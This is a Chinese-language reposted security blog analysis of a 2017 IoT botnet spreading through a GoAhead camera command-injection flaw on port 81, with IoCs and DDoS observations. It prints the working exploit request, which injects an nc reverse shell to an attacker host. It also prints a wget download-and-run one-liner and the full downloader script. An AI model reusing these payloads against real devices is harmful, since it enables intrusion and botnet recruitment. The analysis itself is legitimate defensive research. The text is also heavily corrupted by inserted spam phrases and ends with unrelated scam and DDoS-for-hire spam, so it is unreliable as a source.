互联网上黑客的骗术-一个新IoT僵尸 *** 已经 HTTP 81上中范畴散播
360 *** 信息安全研究所前不久检测到一个新的僵尸 *** 已经大范畴扫描仪全部互联网技术。充分考虑该僵尸 *** 的下列要素,我们决定向安全社区公布大家的发觉成效:
1、经营规模很大,大家现阶段能够见到 ~50k 每日活跃IP
2、有Simple UDP DDoS 进攻纪录,能够评定是恶意代码
3、较新,现阶段还有较多安全性生产商无法鉴别该恶意代码 ( 7/55 virustotal 在网上黑客改高校考试成绩是真是假 )
4、与mirai僵尸 *** 对比,效仿了其端口号 *** 嗅探手法和一部分编码,可是在散播、C2通讯协议、进攻空间向量等重要层面彻底有别于mirai,是新的恶意代码大家族而不可视作mirai的变异
大家整理了该僵尸 *** 的发觉全过程、散播手法、个人行为特点,简单剖析了该僵尸 *** 的攻击性行为,并依照时间轴机构本blog的各小标题以下:
1、GoAhead及好几家摄像头的 RCE 系统漏洞
2、 *** 攻击将系统漏洞武器化
3、大家留意来到来源于 *** 攻击的扫描仪
4、从扫描仪到样版
5、C2 历史时间转变回朔
6、僵尸 *** 经营规模判断
7、有关 212.232.46.46 大家的观查
8、IoC
GoAhead 及好几家摄像头的 RCE 0Day系统漏洞
科学研究工作人员 Pierre Kim (@PierreKimSec) 于 2017-03-08 公布了一个有关GoAhead 及其别的OEM摄像头的敏感在网上黑客改高校考试成绩是真是假性数据分析报告。在机器设备生产商所属层面,原作者强调因为机器设备OEM的缘故,共涉及到了超出 1,250 个不一样摄像头生产商、型号规格;在潜在性感柒机器设备层面,原作者运用Shodan 估计有超出 185,000 个机器设备有潜在性难题。
初始文章内容连接以下:https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
在初始文章内容中, 原作者强调 GoAhead 摄像头存有多个难题,在其中包含:
1、根据出示空缺的 loginuse 和 在网上黑客改高校考试成绩是真是假 loginpas 绕开验证阶段,免费下载机器设备的.ini 文档
2、根据向 set_ftp.cgi 中引入指令,得到 root管理权限,并在机器设备上出示远程控制 Shell
原作者强调 *** 攻击组成应用所述难题,就可以在彻底沒有机器设备动态口令的状况下,得到 机器设备的root管理权限,并出示了一个运用编码。
在所述网页页面中,能够关系到原作者和别的安全社区意见反馈的信息内容。综合性这种意见反馈,大家并沒有观查到沒有机器设备生产商迅速行动起來,为本易损性出示解决 *** ,缘故或许是OEM生产商中间盘根错节的关联,但是更是由于一拖再拖沒有初始生产商付诸行动,才给了 *** 攻击再次充分发挥的室内空间。
过后看,大家觉得 *** 攻击在初始PoC发布后,花了不超过一个月的時间将所述系统漏洞武器化,并在2017-04-16 取得成功造成了大家的在网上黑客改高校考试成绩是真是假留意。
大家具体见到武器化后的payload 有以下特性:
1、 *** 嗅探端口号从 80 改成 81
2、 *** 嗅探端口号时选用相近mirai 的 syn scan 全过程
3、 *** 嗅探 login.cgi 网页页面,猜想 *** 攻击根据这类 *** 进一步精准鉴别受害人。所述三个作法能够提升 僵尸 *** 感柒的高效率
4、应用前文提及的 goahead 0-day 系统漏洞,递送荷载
5、大家尚沒有证据,可是有原因猜疑 *** 攻击在取得成功得到 机器设备root管理权限之后,阻隔了荷载递送安全通道,防止幸不辱命经一样途径角逐机器设备决策权
大家留意来到来源于 *** 攻击的扫描仪
大家初次注意到此次恶性事件,是来源于大家的全世界 *** 扫描实时监控系统系统软件:
http://scan.netlab.360.com/#/dashboard?t *** eg=1490457600000&tsend=1493049600000&dstport=81&toplistname=srcip&topn=30&sortby=sum
图1 port 81 scan bigbang since 2017-04-16
从图上我们可以见到,2017-04-16 是个重要的时间点。取 2017-04-15 与以后的在网上黑客改高校考试成绩是真是假数据对比,当天扫描仪恶性事件总数提高到 400% ~ 700% ,单独扫描仪来源于提高 4000%~6000%。尤其是2017-04-22当日扫描仪来源于超出 57,000,这一数据极大,使我们感觉必须向安全社区提醒这一威协的存有。
图2 detailed volume compare
从扫描仪到样版
荷载
注意到该扫描仪之后,大家就开始了对该威协的追朔和剖析工作中。根据大家的蜜獾系统软件,大家捕捉了下边这组样版。必须事先表明的是,尽管这组样版的取名中包括 mirai 在网上黑客改高校考试成绩是真是假字眼,可是这一组样版的工作方式有别于mirai,并不可以视作mirai的变异,而应当做为一个新的威协来看待。
cd20dcacf52cfe6b5c2a8950daf9220d wificam.sh 428111c22627e1在网上黑客改高校考试成绩是真是假 d4ee87705251704422 mirai.arm 9584b6aec418a2af4efac24867a8c7ec mirai.arm5n 5ebeff1f005804bb8afef91095aac1d9 mirai.arm7 b2b129d84723d0ba2f803a547c9a19ae mirai.mips 2f6e964b3f63b13831314c28185bb51a mirai.mpsl
这组样版的文档信息内容以下:
mirai.arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
mirai.arm5n: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
mirai.arm7: ELF 32-bit LSB executable, ARM,&在网上黑客改高校考试成绩是真是假nbsp;EABI4 version 1 (SYSV), statically linked, stripped
mirai.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mirai.mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
wificam.sh: ASCII text
荷载的递送 ***
在 *** 攻击进行 *** 嗅探81端口号确认存活之后,根据下列 *** 递送重力梯度:
1、 *** 攻击在上文PoC基本上,引入指令驱使受害人机器设备进行nc联接到 在网上黑客改高校考试成绩是真是假 load.gtpnet.ir:1234
2、 *** 攻击操纵load.gtpnet.ir:1234 对每一个被害则进行的联接,递送了 hxxp://ntp.gtpnet.ir/wificam.sh 做为事后免费下载的转站,并根据该脚本 *** 进一步从 hxxp://ntp.gtpnet.ir/ 服务器下载取名为 mirai.arm/mirai.arm5n/mirai.arm7/mirai.mips/mirai.mpsl 的样版
3、这种样版会进一步与操纵 *** 服务器创建联接,到此,受害人机器设备彻底被 *** 攻击操纵,感柒环节完毕,提前准备进行进攻。
所述三段拒绝服务攻击相匹配的编码以下:
1、指令引入环节,驱使受害人创建nc联接到 在网上黑客改高校考试成绩是真是假 load.gtpnet.ir:1234
GET login.cgi HTTP/1.1
GET /set_ftp.cgi?loginuse=admin&loginpas=admin&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(nc load.gtpnet.ir 1234 -e /bin/sh) HTTP/1.1
GET /ftptest.cgi?loginuse=admin&loginpas=admin HTTP/1.1
这一一部分的重力梯度包括在 sef_ftp.cgi 的URI 在网上黑客改高校考试成绩是真是假 中,转换格式后为
nc load.gtpnet.ir 1234 -e bin/sh
受害人因而被威逼向 *** 攻击的 *** 服务器进行nc联接
1、 *** 攻击根据所述nc联接,向受害人机器设备递送了免费下载脚本 *** wificam.sh
$ nc load.gtpnet.ir 1234`
busybox nohup 在网上黑客改高校考试成绩是真是假sh -c "wget http://ntp.gtpnet.ir/wificam.sh -O /tmp/a.sh ;chmod x /tmp/a.sh ;/tmp/a.sh" > /dev/null 2>&1&n bsp;&`
下载脚本 wificam.sh 进一步下载了新的样本文件
$ cat wificam.sh
wget hxxp:/网上黑客改大学成绩是真的吗 /ntp.gtpnet.ir/mirai.arm -O /tmp/arm.bin
wget hxxp://ntp.gtpnet.ir/mirai.arm5n -O /tmp/arm5.bin
wget hxxp://ntp.gtpnet.ir/mirai.arm7 -O /tmp/arm7.bin
wget hxxp://ntp.gtpnet.ir/mirai.mips -O /tmp/mips.bin
wget hxxp://ntp.gtpnet.ir/mirai.mpsl -O /tmp/mpsl.bin
chmod +x /tmp/arm.bin
chmod +x /tmp/arm5.bin
chmod +x /tmp/arm7.bin
chmod +x /tmp/mips.bin
chmod +x /tmp/mpsl.bin
killall *.bin
killall arm
网上黑客改大学成绩是真的吗killall arm5
killall arm7
killall mips
killall mpsl
killall hal
/tmp/arm.bin
/tmp/arm5.bin
/tmp/arm7.bin
/tmp/mips.bin
/tmp/mpsl.bin
rm -rf /tmp/*.bin
将本次扫描归因到这组样本
我们认为本次针对 81 端口扫描归因到这组样本上。
从数据分析角度做出归网上黑客改大学成绩是真的吗因判定更大的障碍,是蜜罐系统采集到的有效数据只有100+ 份,对比全球 *** 扫描实时监测系统中每日独立扫描来源超过57,000,两者差距巨大,使用前者来说明后者,有数据覆盖率不足之嫌。
不过我们在仔细考察当前数据后,有以下发现:
1、这组样本,采集自81端口的扫描活动
2、罐上近期81 端口的扫描,绝大多数指向了这个样本。以4月19日为例,124(/132=94%)的81端网上黑客改大学成绩是真的吗口扫描是该样本发起的;
3、时间窗口方面,我们的三个不同数据源(大网扫描实时监测/C2域名DNS流量/蜜罐扫描流量)上监测均监测到了流量暴涨,且流量暴涨出现的时间均发生在 2016-04-16 03:00:00 附近。三个数据源的覆盖范围各不同,分别是全球范围、中国大陆范围、若干蜜罐部署点范围,三个数据源之间的数据能够交叉映证,是一个较强的证据。
来自Scanmon的数据指出spike首次出现时间点大约是 2017-04-16 03:00:00 附近
来自DNS 的C2 域名解析数据,spike首次出现时间也是在 2017-04-16 03:00:00 附近
来自蜜罐这组样本的出现时间,首次出现时间同样在 2017-04-16 03:00:00 附近(排除奇异点212.232.46.46,后述)。
在仔细衡量上述全部因素后,我们断言网上黑客改大学成绩是真的吗本次扫描可以归因到当前样本。
样本分析
针对样本详尽的逆向分析较为耗时,目前尚在进行中,稍后也许我们会发布更进一步分析。目前阶段,我们可以从样本的 *** 表现中得到以下方面的结论:
1、样本 vs C2控制端
2、样本 vs Simple UDP DDoS 攻击向量
3、样本 vs mirai
4、样本 vs IoT
另外目前各杀毒厂商对该样本的认定尚不充分(7/55 virustotal),这也是我们希望向安全社区发声的原因之一。
样本 vs C2控制端
通过已经完成的逆向工程,我们已经能够确定无论是在感染阶段还是攻击阶段,样本都会与 load.gtpnet.ir/ntp.gtpnet.ir 通信。
样本 vs Simple UDP DDoS 攻击向量
样本中包含了 DDoS 攻击向量。我们在 2017-04-23 21:45:00 附近,观察到沙箱中的样本向 185网上黑客改大学成绩是真的吗.63.190.95 发起了DDoS 攻击。
这次攻击也被 DDoSmon.net 检测到了:https://ddo *** on.net/explore/185.63.190.95
进一步分析攻击向量的构成:
从DDo *** on的统计来看,攻击主要针对受害者的 UDP 53/123/656 端口,填充包大小主要集中在125/139
从沙箱的Pcap分析来看,攻击覆盖受害者的 UDP 53/123 端口,填充包大小能够映证上述DDosMon.net的数据。
另外从沙箱Pcap数据来看,攻击包使用了真实IP地址,在填充包中填充的是 SSDP(UDP 1900)的数据。 沙箱中看到的攻击包特征:
Simple UDP 53 DDoS with a SSDP1900 padding
Simple UDP 123 DDoS with a SSDP1900 padding
样本 vs mirai
样本与mirai有较多联系,也有很大变化,总体而言,我们认为这是一个全新的家族,不将其并入mirai家族。
样本与mirai的不同点包括:
传播阶段:不再猜测 23/2323 端口上的弱密码;通过 81 端口上的 GoAhead RCE 漏洞传播
C2通信协议:完全不同于mirai
攻击向量:完全不同于mirai;前面提到 UDP 53/123/656 端口的攻击向量,mirai是不具有的;而mirai特有的、创下记录的GRE/STOMP攻击向量,在这组样本中完全不存在;
样本也的确与mirai有一些共同点:
传播阶段:使用非正常的 syn scan 来加速端口扫描的过程。不过今天这个技巧已经被非常多的恶意代码家族使用,不再能算作mirai独有的特点
文件命名:使用了 mirai 这个字符串
代码重用:重用了较多mirai的部分代码
尽管有若干共同点,由于传播、攻击向量等关键特征已经与mirai完全没有共同之处,我们仍然倾向将这个样本与mirai区别开来。
样本 vs IoT
在前面的分析中网上黑客改大学成绩是真的吗,我们已经了解到这一组样本主要针对IoT设备传播,但具体是1200+种设备中的哪些种类尚不明确。不过在360 *** 安全研究院,我们可以使用DNS数据维度进一步刻画受感染设备的归属。
我们经常使用D2V工具来寻找域名的伴生域名,在这个案例,我们观察到 ntp.gtpnet.ir 域名在 2017-04-16之前没有伴生域名,之后与下列域名伴生:
s3.vstarcam.com
s2.eye4.cn
ntp.gtpnet.ir
api.vanelife.com
load.gtpnet.ir
ntp2.eye4.cn
push.eye4.cn
push.eyecloud.so
ntp.eye4.cn
m2m.vanelife.com`
这些域名的具体网站标题如下:
基于上述数据可以进一步刻画受感染设备的归属。
C2 历史变化回溯
DNS历史解析记录变化
我们看到的两个域名的历史解析记录如下
可以看出:
1、load.gtpnet.ir 一直指向 185.45.192.168
2、ntp.gtpnet.ir 的IP地址则发生了多次变换,比较不稳定
3、我们在沙箱中也同样观察到了上述 ntp.gtpnet.ir 的IP地址不稳定的情况
上述 ntp.gtpnet.ir 网上黑客改大学成绩是真的吗 IP地址不稳定现象也许可以用下面的事实来解释:
从样本分析来看,前者仅负责投递初始下载器,负载相对较轻;后者不仅负责投递wificam.sh 和 5个 elf 样本,还承担与bot通信的责任,负载比前者重很多倍。
整个botnet的规模较大,服务器同时与数万bot通信的负载较高。
C2 的whois 域名关联
域名的whois 网上黑客改大学成绩是真的吗 网上黑客改大学成绩是真的吗 信息如下:
domain: gtpnet.ir
ascii: gtpnet.ir
remarks: (Domain Holder) javad fooladdadi
remarks: (Domain Holder Address) Imarat hashtom, apartemanhaye emarat hashtom, golbahar, khorasan razavi, IR
holder-c: jf280-irnic
admin-c: jf280-irnic
tech-c: mk3389-irnic
nserver: etta.ns.cloudflare.com
nserver: dom.ns.cloudflare.comlast-updated: 2017-04-19
expire-date: 2018-04-06source: IRNIC # Filtered
nic-hdl: jf280-irnic
person: javad fooladdadi
org: personal
e-mail: ademaiasantos@gmail.comaddress: Imarat hashtom, apartemanhaye emarat hashtom, golbahar, khorasan razavi, IR
phone: +989155408348
fax-no: +989155408348
source: IRNIC # Filtered
nic-hdl: mk3389-irnic
person: Morteza Khayati
e-mail: morteza.khayati1@gmail.comsource: IRNIC # Filtered
上述域名的注册时间,推测发生在 网上黑客改大学成绩是真的吗 网上黑客改大学成绩是真的吗 网上黑客改大学成绩是真的吗 2017-0网上黑客改大学成绩是真的吗4-06 (因为失效时间是 2018-04-06),恰好发生在攻击者武器化的期间 (2017-03-08 ~ 2017-04-16),可以断定是专为本僵尸 *** 而注册的域名。
但是两个域名注册email地址与本僵尸 *** 的关联尚缺少证据进一步支撑。其中ademaiasantos@gmail.com与以下两个域名关联:
hostsale.net
almashost.com
特别是 almashost.com 的注册时间发生在 2009 年,并且看起来是有域名交易/域名网上黑客改大学成绩是真的吗停靠的事情发生,倾向认为与本次攻击并无直接关联。这样,email地址 ademaiasantos@gmail.com 是如何卷入本次攻击的,尚不得而知。
僵尸 *** 规模判定
DNS系统视角度量僵尸 *** 规模
到现在(2017-04-24)为止,我们从DNS数据中(中国大陆地区),能够看到与C2服务器通信的僵尸规模有 43,621。由于我们数据的地缘性限制,我们看到的分布主要限定在中国大陆地区。具 *** 置分布如下:
中国大陆地区每日活跃的bot数量在 2,700 ~ 9,500 之间,如下:
关于 212.232.网上黑客改大学成绩是真的吗46.46 我们的观察
在所有扫中我们蜜罐的来源IP中, 212.232.46.46 是特殊的一个。从时间分布上来说,这个IP是孤立的一个,在他之前没有其他IP以这种方式扫描我们的蜜罐。在他之后,5个小时内一个都没有、但是之后蜜罐就被密集的扫中。
网上黑客改大学成绩是真的吗目前为止,我们只知道这个IP是个数据上的奇异点,但这个IP与攻击者之间的关系并不清楚,期待睿智的网上黑客改大学成绩是真的吗读者为我们补上拼图中缺失的那块。附上该IP地址的历史扫描行为:
IoC
样本
cd20dcacf52网上黑客改大学成绩是真的吗cfe2b5c2a8950daf9220d wificam.sh
428111c22627e1d4ee87705251704422 mirai.arm
9584b6aec418a2af4efac24867a8c7ec mirai.arm5n
5ebeff1f005804bb8afef91095aac1d9 mirai.arm7
b2b129d84723d0ba2f803a546c8b19ae mirai.mips
2f6e964b3f63b13网上黑客改大学成绩是真的吗831314c28185bb51a mirai.mpsl
控制主机
ntp.gtpnet.ir
load.gtpnet.ir
本文转载自 netlab.360.com
原文链接:http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-81-ch/
3800cc.comhackbase.com发现执法者DDOS还网上黑客改大学成绩是真的吗 不错,而且有多重常规攻击模式,这里还提供20-300Gbps,自己留意下就知道了。 *** 上黑客的骗局
黑客改一门成绩多少钱。谁告诉能改要改需要先物品代码没闲蛋疼找物品代码既想改半盗版dlc肯定直接敌打竞技场水都竞技场打完rankex送10金苹吃等级降10没dlc版玩家ce。
*** 上黑客的骗局都是一群骗子,根本不可能实现的,聊天记录是本地记录的,拥有会员才可以上传 *** ,这个是要设置,如果设置了,那么就需要。
关闭一些经常被黑客利用的端口使用杀毒软件带有防火墙的那种绝对不推荐你使用360一般来说黑客不会控制你的电脑盗取资料也最多也是游戏账号一般靠。
HackerApersonwhoenjoysexploringthedetailsofcomputersandhowtostretchtheircapabilities.Amaliciousorinquisitivemeddlerwhotries。 *** 上黑客的骗局
黑客本身并不违法,但是要是入侵别人网站盗取信息可能构成盗窃罪。窃取、收买、非法提供信用卡信息罪,是指窃取、收。
*** 上黑客的骗局。这就是为什么他们是黑客天才都市,未语浅笑的。一个从偏僻小渔村走出来的天才少年,搅动了整个世界!他是全球黑客界神秘的“零”,是世界各国情报部门严密追查的头号危险人物,因为。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
